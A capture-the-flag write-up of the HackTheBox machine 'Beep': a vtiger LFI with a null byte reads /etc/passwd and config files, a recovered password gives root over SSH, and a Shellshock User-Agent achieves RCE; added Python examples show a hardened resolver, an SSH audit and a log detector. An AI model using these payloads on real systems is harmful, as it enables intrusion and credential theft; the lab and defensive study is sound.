HackTheBox - Beep

Morten Hansen • January 30, 2022

Beep

IP 10.10.10.7
NMAP

22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp   open  ssl/https?
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

The scan shows a lot of open ports, and browsing to the web ports reveals several different web sites. Running gobuster against the HTTPS site gives some hits.

gobuster dir -u https://10.10.10.7 -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -x php,txt,html -b 403,404,302 -o enum/gobust -k

/.htaccess.html       (Status: 403) [Size: 292]
/.htpasswd            (Status: 403) [Size: 287]
/.htaccess            (Status: 403) [Size: 287]
/.htpasswd.php        (Status: 403) [Size: 291]
/.htaccess.php        (Status: 403) [Size: 291]
/.htpasswd.txt        (Status: 403) [Size: 291]
/.htaccess.txt        (Status: 403) [Size: 291]
/.htpasswd.html       (Status: 403) [Size: 292]
/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/.html        (Status: 403) [Size: 291]
/cgi-bin/             (Status: 403) [Size: 286]
/configs              (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
/config.php           (Status: 200) [Size: 1785]
/favicon.ico          (Status: 200) [Size: 894]
/help                 (Status: 301) [Size: 308] [--> https://10.10.10.7/help/]
/images               (Status: 301) [Size: 310] [--> https://10.10.10.7/images/]
/index.php            (Status: 200) [Size: 1785]
/lang                 (Status: 301) [Size: 308] [--> https://10.10.10.7/lang/]
/libs                 (Status: 301) [Size: 308] [--> https://10.10.10.7/libs/]
/mail                 (Status: 301) [Size: 308] [--> https://10.10.10.7/mail/]
/modules              (Status: 301) [Size: 311] [--> https://10.10.10.7/modules/]
/panel                (Status: 301) [Size: 309] [--> https://10.10.10.7/panel/]
/recordings           (Status: 301) [Size: 314] [--> https://10.10.10.7/recordings/]
/register.php         (Status: 200) [Size: 1785]
/robots.txt           (Status: 200) [Size: 28]
/static               (Status: 301) [Size: 310] [--> https://10.10.10.7/static/]
/themes               (Status: 301) [Size: 310] [--> https://10.10.10.7/themes/]
/var                  (Status: 301) [Size: 307] [--> https://10.10.10.7/var/]
/vtigercrm            (Status: 301) [Size: 313] [--> https://10.10.10.7/vtigercrm/]

Enumerating some of the folders we find services such as FreePBX on port 443 and Webmin on port 10000. The folder /vtigercrm leads us to vtiger, and after some research we find an LFI exploit for it.

By requesting https://10.10.10.7//vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=/../../../../../etc/asterisk/sip_additional.conf%00 we can read local files on the target server. It is important to use absolute paths to files the web server has permission to read, and to append %00 (a null byte) to the path, otherwise the LFI does not read the file. Reading /etc/passwd this way gives:

root:x:0:0:root:/root:/bin/bash 
bin:x:1:1:bin:/bin:/sbin/nologin 
daemon:x:2:2:daemon:/sbin:/sbin/nologin 
adm:x:3:4:adm:/var/adm:/sbin/nologin 
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync 
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
halt:x:7:0:halt:/sbin:/sbin/halt 
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin 
news:x:9:13:news:/etc/news: 
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin 
operator:x:11:0:operator:/root:/sbin/nologin 
games:x:12:100:games:/usr/games:/sbin/nologin 
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin 
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 
nobody:x:99:99:Nobody:/:/sbin/nologin 
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash 
distcache:x:94:94:Distcache:/:/sbin/nologin 
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin 
pcap:x:77:77::/var/arpwatch:/sbin/nologin 
ntp:x:38:38::/etc/ntp:/sbin/nologin 
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash 
dbus:x:81:81:System message bus:/:/sbin/nologin 
apache:x:48:48:Apache:/var/www:/sbin/nologin 
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin 
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin 
postfix:x:89:89::/var/spool/postfix:/sbin/nologin 
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash 
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin 
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin 
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin 
spamfilter:x:500:500::/home/spamfilter:/bin/bash 
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin 
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin 
fanis:x:501:501::/home/fanis:/bin/bash 
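To make the null-byte point concrete, here is an added Python example (not code from this writeup or from vTiger) that models the vulnerable include pattern beside a hardened resolver. The module directory, the appended suffix and the sample module name are assumptions chosen for illustration; the traversal input has the same shape as the request above.

```python
import posixpath
import re

# Constructed values for the example: the real vtiger layout on the box is not
# shown in the writeup, so the module directory and the appended suffix are
# assumptions made for illustration only.
MODULE_DIR = "/var/www/html/vtigercrm/modules"
SUFFIX = "/language/en_us.lang.php"
MODULE_NAME_RE = re.compile(r"[A-Za-z0-9_]+")


def legacy_include_path(module_name: str) -> str:
    """Model of the vulnerable pattern: the request parameter is pasted into a
    file path and a fixed suffix is appended.  PHP before 5.3.4 handed such a
    string to the C library, which stops at the first NUL byte, so a %00 in the
    parameter silently discards the suffix.  We simulate that truncation and
    normalise the result to show which file the server would actually open."""
    path = f"{MODULE_DIR}/{module_name}{SUFFIX}"
    truncated = path.split("\x00", 1)[0]
    return posixpath.normpath(truncated)


def hardened_include_path(module_name: str) -> str:
    """Hardened resolver: reject NUL bytes, allow-list the module name, and
    verify that the normalised path still lies under MODULE_DIR."""
    if "\x00" in module_name:
        raise ValueError("NUL byte in module name")
    if not MODULE_NAME_RE.fullmatch(module_name):
        raise ValueError("module name must match [A-Za-z0-9_]+")
    candidate = posixpath.normpath(f"{MODULE_DIR}/{module_name}{SUFFIX}")
    # Defence in depth: even if the allow-list were relaxed later, a resolved
    # path outside the module directory is still refused.
    if not candidate.startswith(MODULE_DIR + "/"):
        raise ValueError("resolved path escapes the module directory")
    return candidate


def compare(module_name: str) -> dict:
    """Show what each resolver does with one input."""
    try:
        hardened = hardened_include_path(module_name)
    except ValueError as exc:
        hardened = f"rejected: {exc}"
    return {"legacy": legacy_include_path(module_name), "hardened": hardened}


if __name__ == "__main__":
    for name in ("com_vtiger_workflow", "/../../../../../etc/passwd\x00"):
        print(repr(name), compare(name))
```

The legacy resolver turns the traversal-plus-NUL input into /etc/passwd, which is exactly why the %00 is needed in the request above; the hardened one refuses it twice over (NUL byte, then allow-list), and the final prefix check catches anything that slips past a future relaxation of the allow-list.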

It is also possible to read files from the web folder at /var/www/html/ and then work through the folders found with gobuster. The folders themselves do not give much information, so we can look for configuration files (*.conf) belonging to some of the installed services, such as FreePBX.

#some config-files related to Elastix and PBX
/etc/amportal.conf
/etc/rc.local
/etc/zaptel.conf
/etc/fxotune.conf
/etc/asterisk/asterisk.conf
/etc/asterisk/cdr_mysql.conf
/etc/asterisk/enum.conf
/etc/asterisk/extensions.conf
/etc/asterisk/extensions_additional.conf
/etc/asterisk/extensions_custom.conf
/etc/asterisk/features.conf
/etc/asterisk/flite.conf
/etc/asterisk/iax.conf
/etc/asterisk/iax_additional.conf
/etc/asterisk/iax_custom.conf
/etc/asterisk/iax_custom_post.conf
/etc/asterisk/iax_general_additional.conf
/etc/asterisk/iax_general_custom.conf
/etc/asterisk/iax_registrations_custom.conf
/etc/asterisk/iax_registrations.conf
/etc/asterisk/indications.conf
/etc/asterisk/localprefixes.conf
/etc/asterisk/logger.conf
/etc/asterisk/manager.conf
/etc/asterisk/meetme.conf
/etc/asterisk/modem.conf
/etc/asterisk/modules.conf
/etc/asterisk/musiconhold.conf
/etc/asterisk/musiconhold_additional.conf
/etc/asterisk/musiconhold_custom.conf
/etc/asterisk/phone.conf
/etc/asterisk/phpagi.conf
/etc/asterisk/privacy.conf
/etc/asterisk/queues.conf
/etc/asterisk/rtp.conf
/etc/asterisk/sip.conf
/etc/asterisk/version
/etc/asterisk/voicemail.conf
/etc/asterisk/vm_email.inc
/etc/asterisk/vm_general.inc
/etc/asterisk/zapata.conf
/etc/asterisk/zapata-auto.conf

Some of the files contain usernames and passwords.

user: admin password: jEhdIekWmdjE

We try to SSH into the server with usernames from the passwd file, but get an error message.

ssh asterisk@10.10.10.7

Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

We fix this by adding -oKexAlgorithms=+diffie-hellman-group1-sha1 to the command. After trying the users, we get a root shell by connecting as root with the password we found through the LFI.
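As an added example (not part of the original writeup), here is a small Python audit that parses that OpenSSH error line and reports which of the server's offered key-exchange methods are legacy: anything SHA-1 based, or the 1024-bit group1 method. The classification rules are my own; the input line is the one shown above.

```python
import re
from typing import Dict, List

OFFER_RE = re.compile(r"Their offer:\s*(.+)$")


def parse_offer(error_line: str) -> List[str]:
    """Extract the comma-separated algorithm list from an OpenSSH
    'Unable to negotiate ... Their offer: ...' message."""
    m = OFFER_RE.search(error_line)
    if not m:
        return []
    return [a.strip() for a in m.group(1).split(",") if a.strip()]


def kex_weakness(algorithm: str) -> List[str]:
    """Return the reasons a key-exchange method counts as legacy (empty if none)."""
    reasons = []
    if algorithm.endswith("-sha1"):
        reasons.append("hashes with SHA-1")
    if "diffie-hellman-group1-" in algorithm:
        reasons.append("uses a 1024-bit MODP group")
    return reasons


def audit_kex_offer(error_line: str) -> Dict:
    """Summarise an offer: everything offered, the weak subset with reasons,
    and whether the server has nothing modern at all (as on this box)."""
    offered = parse_offer(error_line)
    weak = {a: kex_weakness(a) for a in offered if kex_weakness(a)}
    return {
        "offered": offered,
        "weak": weak,
        "all_legacy": bool(offered) and len(weak) == len(offered),
    }


# The error line from the writeup, used as sample input.
SAMPLE_ERROR = (
    "Unable to negotiate with 10.10.10.7 port 22: no matching key exchange "
    "method found. Their offer: diffie-hellman-group-exchange-sha1,"
    "diffie-hellman-group14-sha1,diffie-hellman-group1-sha1"
)

if __name__ == "__main__":
    report = audit_kex_offer(SAMPLE_ERROR)
    for algo, reasons in report["weak"].items():
        print(f"{algo}: {'; '.join(reasons)}")
    print("server offers only legacy key exchange:", report["all_legacy"])
```

When every offered method is legacy, re-enabling one on the client with -oKexAlgorithms=+... is the only way to connect, which is what the writeup does; on a server you administer, the fix is upgrading OpenSSH (4.3 here) rather than keeping SHA-1 exchanges enabled in sshd_config.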

TIP

It is worth checking /proc/self/status when enumerating with an LFI. It shows the uid and gid of the process reading the file, which we can look up in /etc/passwd to find out which user we are running as.

We can also use Burp Suite Intruder to run through wordlists looking for log and config files: in the request, mark the part of the URL we want to fuzz and press Add to make it a payload position, define the wordlist under the Payloads tab, then start the attack and check which requests come back successfully.

We then get the flags from /home/fanis/user.txt and /root/root.txt. (It is also possible to read user.txt through the LFI.)

It is also possible to get access by exploiting a shell script inside the /cgi-bin/ folder on port 10000. Run gobuster against that folder to find the script, then use the Shellshock exploit to get RCE.

#edit User-Agent in BurpSuite
User-Agent: () { :; }; sleep 10
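From the defender's side, the LFI request earlier in the writeup and this Shellshock header both leave recognisable traces in web-server access logs. The following added Python example (not from the original post) parses Apache combined-format lines and flags path traversal, null bytes in the request target, and the Shellshock function-definition pattern in request headers. The log lines are constructed for the example: the client address, timestamps, sizes and the /cgi-bin/example.sh path are made up, while the LFI target and User-Agent string are the ones shown in the writeup.

```python
import re
from typing import Dict, List, Set
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Shellshock payloads start with an empty bash function definition: "() {"
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


def parse_line(line: str) -> Dict[str, str]:
    """Split one combined-format line into its fields."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised log line: {line!r}")
    return m.groupdict()


def classify(entry: Dict[str, str]) -> Set[str]:
    """Return the set of indicators found in one parsed entry."""
    findings = set()
    raw = entry["target"]
    decoded = unquote(raw)  # catches %2e%2e and %00 encodings too
    if "../" in decoded or "..\\" in decoded:
        findings.add("path_traversal")
    if "%00" in raw.lower() or "\x00" in decoded:
        findings.add("null_byte")
    # The function-definition pattern is abnormal in any header value; the
    # User-Agent and Referer are the two the combined format records.
    for header in (entry["ua"], entry["referer"]):
        if SHELLSHOCK_RE.search(header):
            findings.add("shellshock_pattern")
    return findings


def scan(lines: List[str]) -> List[Dict]:
    """Run classification over a log and keep only the lines with findings."""
    results = []
    for line in lines:
        entry = parse_line(line)
        hits = classify(entry)
        if hits:
            results.append({"host": entry["host"], "target": entry["target"],
                            "findings": sorted(hits)})
    return results


# Constructed sample log: one benign request, the LFI request from the
# writeup, and a request carrying the Shellshock User-Agent from the writeup
# against a made-up CGI script name.
SAMPLE_LOG = [
    '10.10.14.5 - - [30/Jan/2022:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 1785 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [30/Jan/2022:10:00:07 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/'
    'sortfieldsjson.php?module_name=/../../../../../etc/passwd%00 HTTP/1.1" 200 1702 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [30/Jan/2022:10:00:12 +0000] "GET /cgi-bin/example.sh HTTP/1.1" 200 0 "-" "() { :; }; sleep 10"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["host"], hit["target"], ", ".join(hit["findings"]))
```

Webmin on port 10000 writes its own log rather than Apache's, so in practice the Shellshock check would be pointed at that file as well; the header pattern is the same wherever it is logged.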